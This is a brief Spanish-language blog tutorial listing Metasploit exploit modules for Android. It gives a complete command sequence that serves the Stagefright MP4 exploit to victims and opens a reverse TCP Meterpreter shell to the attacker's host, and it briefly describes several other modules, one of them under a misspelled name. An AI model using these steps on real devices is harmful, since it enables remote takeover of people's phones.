viernes, 15 de septiembre de 2017

Exploits de metasploit para android

Hola amigos:

Hoy vamos a conocer los exploits que trae metasploit (en el momento de escribir estas líneas) para explotar android.

Uno de ellos es stagefright_mp4_tx3g_64_bit:

use exploit/android/browser/stagefright_mp4_tx3g_64_bit

set SRVHOST 192.168.1.131

set URIPATH /

set PAYLOAD linux/armle/mettle/reverse_tcp

set LHOST 192.168.1.131

exploit

Montará un servidor en el puerto indicado (como no lo hemos cambiado, el puerto 8080). Aunque sí es para varios móviles, no es para todos. Cuando la víctima ingresa a esa url maliciosa, explota una vulnerabilidad en la librería stagefright, mediante un archivo mp4.

Otros exploit son:

  • exploit/android/adb_server_exec: Explota un dispositivo android que está escuchando mensajes de depuración adb (adb nos permite interactuar entre un android y un pc).


  • webview_addjavascriptinterface: Para la versión 4.1.2. Un código javascript no confiable puede ejecutar comandos arbitrarios.


  • adobe_reader_pdf_js_interface: Explota una vulnerabilidad de Acrobat Reader en versiones menores a 11.2.0 que crea un pdf infectado.

  • frutex_requeue: Explota una vulnerabilidad en frutex_requeue en el kernel de linux. Todos los núcleos anteriores a Junio del 2014 están expuestos. Es necesaria una sesión previa de meterpreter.

  • put_user_vroot: Permite a un usuarios sin privilegios leer y escribir en la memoria del kernel.




No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.